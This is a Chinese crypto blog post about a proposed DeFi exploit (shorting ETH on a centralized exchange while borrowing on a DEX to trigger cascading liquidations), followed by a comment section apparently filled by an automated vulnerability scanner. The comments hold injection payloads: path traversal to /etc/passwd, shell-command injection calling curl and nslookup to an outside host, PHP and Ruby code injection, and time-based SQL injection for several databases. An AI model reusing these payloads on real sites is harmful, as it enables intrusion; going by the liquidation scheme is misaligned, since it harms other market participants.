DEFI闪电贷之外的另一种漏洞分析

BitMEX 100倍杠杆永续合约,注册BitMex请使用日本IP:比特币量化交易交流群:191896494  BitMEX/OKEX量化机器人  


DEFI是最近区块链世界里面非常火的一个概念,尤其是最近fcoin的跑路,导致大家对中心化交易所的不信任,一直不温不火的KNC借助DEFI的概念翻了8倍,可谓今年币圈最大的亮点,其中闪电贷是DEFI中的一个创新尝试,最近成为外界关注的热点,两名黑客利用闪电贷攻击了 保证金交易协议 bZx ,第一起套利金额为 35 万美元 ,之后又搞了一起 套利金额 60 万美元 的翻版攻击。

那么今天笔者大胆提出DEFI模式的另外一个漏洞:

1、缓慢的在中心化平台上开空ETH,在dex上借出等量的ETH,假设10万个,越多越容易成功

2、接下来将出现两种情况:

a,价格大幅下跌偏离借贷时的价格,越过dex平仓线,引起DEX上连环爆仓,价格继续下挫,那么中心化平台上低于dex借贷平仓线的部分就是自己的盈利了

b,价格大幅上涨偏离借贷时的价格,越过中心交易所平仓线,由于中心化交易所流动性比较充足,不引起连环爆仓,那么此时在dex上归还eth,亏利息。

以上攻击漏洞和闪电贷相比,对时间没有那么敏感,可以慢慢的开仓,而闪电贷需要迅速完成攻击,才可能盈利,但是这种模式对资金量要求比较高,如果没法导致大幅穿仓,也无法盈利,当然亏损也只是利息。


  admin   2020-3-8

jJQaBOcg2023-9-23 3:40:13
/../../../../../../../../../../windows/system32/BITSADMIN.exe
jJQaBOcg2023-9-23 3:40:13
response.write(9945114*9747019)
jJQaBOcg2023-9-23 3:40:14
'+response.write(9945114*9747019)+'
jJQaBOcg2023-9-23 3:40:15
"+response.write(9945114*9747019)+"
jJQaBOcg2023-9-23 3:40:19
../../../../../../../../../../../../../../etc/passwd
jJQaBOcg2023-9-23 3:40:20
../../../../../../../../../../../../../../windows/win.ini
jJQaBOcg2023-9-23 3:40:20
bcc:009247.40289-43388.40289.ecab7.19622.2@bxss.me
jJQaBOcg2023-9-23 3:40:20
echo imtrjc$()\ zvajqc\nz^xyu||a #' &echo imtrjc$()\ zvajqc\nz^xyu||a #|" &echo imtrjc$()\ zvajqc\nz^xyu||a #
jJQaBOcg2023-9-23 3:40:21
file:///etc/passwd
jJQaBOcg2023-9-23 3:40:21
to@example.com> bcc:009247.40289-43389.40289.ecab7.19622.2@bxss.me
jJQaBOcg2023-9-23 3:40:21
&echo rxbvqz$()\ ntypgn\nz^xyu||a #' &echo rxbvqz$()\ ntypgn\nz^xyu||a #|" &echo rxbvqz$()\ ntypgn\nz^xyu||a #
jJQaBOcg2023-9-23 3:40:22
|echo tsqobl$()\ enqqtu\nz^xyu||a #' |echo tsqobl$()\ enqqtu\nz^xyu||a #|" |echo tsqobl$()\ enqqtu\nz^xyu||a #
jJQaBOcg2023-9-23 3:40:22
../
jJQaBOcg2023-9-23 3:40:23
(nslookup -q=cname hitotxgonizmqd97ab.bxss.me||curl hitotxgonizmqd97ab.bxss.me))
jJQaBOcg2023-9-23 3:40:24
$(nslookup -q=cname hitfkmogkyhcdcfc0f.bxss.me||curl hitfkmogkyhcdcfc0f.bxss.me)
jJQaBOcg2023-9-23 3:40:25
12345'"\'\");|]*{ <>�''
jJQaBOcg2023-9-23 3:40:25
&nslookup -q=cname hitjzbjailwvb115f0.bxss.me&'\"`0&nslookup -q=cname hitjzbjailwvb115f0.bxss.me&`'
jJQaBOcg2023-9-23 3:40:26
&(nslookup -q=cname hitfnwbqhdqie0cfa5.bxss.me||curl hitfnwbqhdqie0cfa5.bxss.me)&'\"`0&(nslookup -q=cname hitfnwbqhdqie0cfa5.bxss.me||curl hitfnwbqhdqie0cfa5.bxss.me)&`'
jJQaBOcg2023-9-23 3:40:27
|(nslookup -q=cname hitykfcwnmobjbe5b2.bxss.me||curl hitykfcwnmobjbe5b2.bxss.me)
jJQaBOcg2023-9-23 3:40:28
`(nslookup -q=cname hitopfgmycofv665a9.bxss.me||curl hitopfgmycofv665a9.bxss.me)`
jJQaBOcg2023-9-23 3:40:29
!(()&&!|*|*|
jJQaBOcg2023-9-23 3:40:30
^(#$!@#$)(()))******
jJQaBOcg2023-9-23 3:40:30
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
jJQaBOcg2023-9-23 3:40:31
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
jJQaBOcg2023-9-23 3:40:32
'.gethostbyname(lc('hitrc'.'dfnjdxna166c3.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(90).chr(118).chr(86).'
jJQaBOcg2023-9-23 3:40:32
Http://bxss.me/t/fit.txt
jJQaBOcg2023-9-23 3:40:32
".gethostbyname(lc("hitrb"."pzclrjzh65fd5.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(84).chr(107).chr(72)."
jJQaBOcg2023-9-23 3:40:32
http://bxss.me/t/fit.txt?.jpg
jJQaBOcg2023-9-23 3:40:35
/etc/shells
jJQaBOcg2023-9-23 3:40:36
c:/windows/win.ini
jJQaBOcg2023-9-23 3:40:37
bxss.me
jJQaBOcg2023-9-23 3:40:38
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
jJQaBOcg2023-9-23 3:40:39
"+"A".concat(70-3).concat(22*4).concat(106).concat(78).concat(117).concat(84)+(require"socket" Socket.gethostbyname("hitzs"+"nybxzsek9f670.bxss.me.")[3].to_s)+"
jJQaBOcg2023-9-23 3:40:39
';print(md5(31337));$a='
jJQaBOcg2023-9-23 3:40:40
'+'A'.concat(70-3).concat(22*4).concat(110).concat(75).concat(101).concat(82)+(require'socket' Socket.gethostbyname('hitjy'+'dkaofjab6ca77.bxss.me.')[3].to_s)+'
jJQaBOcg2023-9-23 3:40:41
";print(md5(31337));$a="
jJQaBOcg2023-9-23 3:40:41
260
jJQaBOcg2023-9-23 3:40:41
'"()
jJQaBOcg2023-9-23 3:40:42
${@print(md5(31337))}
jJQaBOcg2023-9-23 3:40:42
260
jJQaBOcg2023-9-23 3:40:42
'&&sleep(27*1000)*kuppfc&&'
jJQaBOcg2023-9-23 3:40:43
${@print(md5(31337))}\
jJQaBOcg2023-9-23 3:40:44
'.print(md5(31337)).'
jJQaBOcg2023-9-23 3:40:45
260/.
jJQaBOcg2023-9-23 3:40:45
"&&sleep(27*1000)*bbhzzm&&"
jJQaBOcg2023-9-23 3:40:47
'||sleep(27*1000)*gqfxhz||'
jJQaBOcg2023-9-23 3:40:48
"||sleep(27*1000)*kktkvv||"
jJQaBOcg2023-9-23 3:49:09
vBodiHNK
jJQaBOcg2023-9-23 3:49:16
-1 OR 2+118-118-1=0+0+0+1
jJQaBOcg2023-9-23 3:49:16
-1 OR 3+118-118-1=0+0+0+1
jJQaBOcg2023-9-23 3:49:17
-1 OR 3*2<(0+5+118-118)
jJQaBOcg2023-9-23 3:49:18
-1 OR 3*2>(0+5+118-118)
jJQaBOcg2023-9-23 3:49:42
if(now()=sysdate(),sleep(15),0)
jJQaBOcg2023-9-23 3:50:15
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
jJQaBOcg2023-9-23 3:50:38
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
jJQaBOcg2023-9-23 3:51:03
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
jJQaBOcg2023-9-23 3:51:33
-1; waitfor delay '0:0:15' --
jJQaBOcg2023-9-23 3:51:56
-1); waitfor delay '0:0:15' --
jJQaBOcg2023-9-23 3:52:20
-1)); waitfor delay '0:0:15' --
jJQaBOcg2023-9-23 3:52:46
1 waitfor delay '0:0:15' --
jJQaBOcg2023-9-23 3:53:10
1fzljHwq'; waitfor delay '0:0:15' --
jJQaBOcg2023-9-23 3:53:34
QwikGWjy'); waitfor delay '0:0:15' --
jJQaBOcg2023-9-23 3:53:58
2EF2EEUR')); waitfor delay '0:0:15' --
jJQaBOcg2023-9-23 3:54:19
-5 OR 761=(SELECT 761 FROM PG_SLEEP(15))--
jJQaBOcg2023-9-23 3:54:38
-5) OR 280=(SELECT 280 FROM PG_SLEEP(15))--
jJQaBOcg2023-9-23 3:55:04
-1)) OR 848=(SELECT 848 FROM PG_SLEEP(15))--
jJQaBOcg2023-9-23 3:55:37
8hCjXRqa' OR 154=(SELECT 154 FROM PG_SLEEP(15))--
jJQaBOcg2023-9-23 3:56:01
dYUw9dEG') OR 516=(SELECT 516 FROM PG_SLEEP(15))--
jJQaBOcg2023-9-23 3:56:24
uLY6yQWC')) OR 509=(SELECT 509 FROM PG_SLEEP(15))--
jJQaBOcg2023-9-23 3:56:44
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
jJQaBOcg2023-9-23 3:57:06
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
jJQaBOcg2023-9-23 3:57:07
1'"
jJQaBOcg2023-9-23 3:57:07
1����%2527%2522
jJQaBOcg2023-9-23 3:57:08
@@OuRgz
Remark: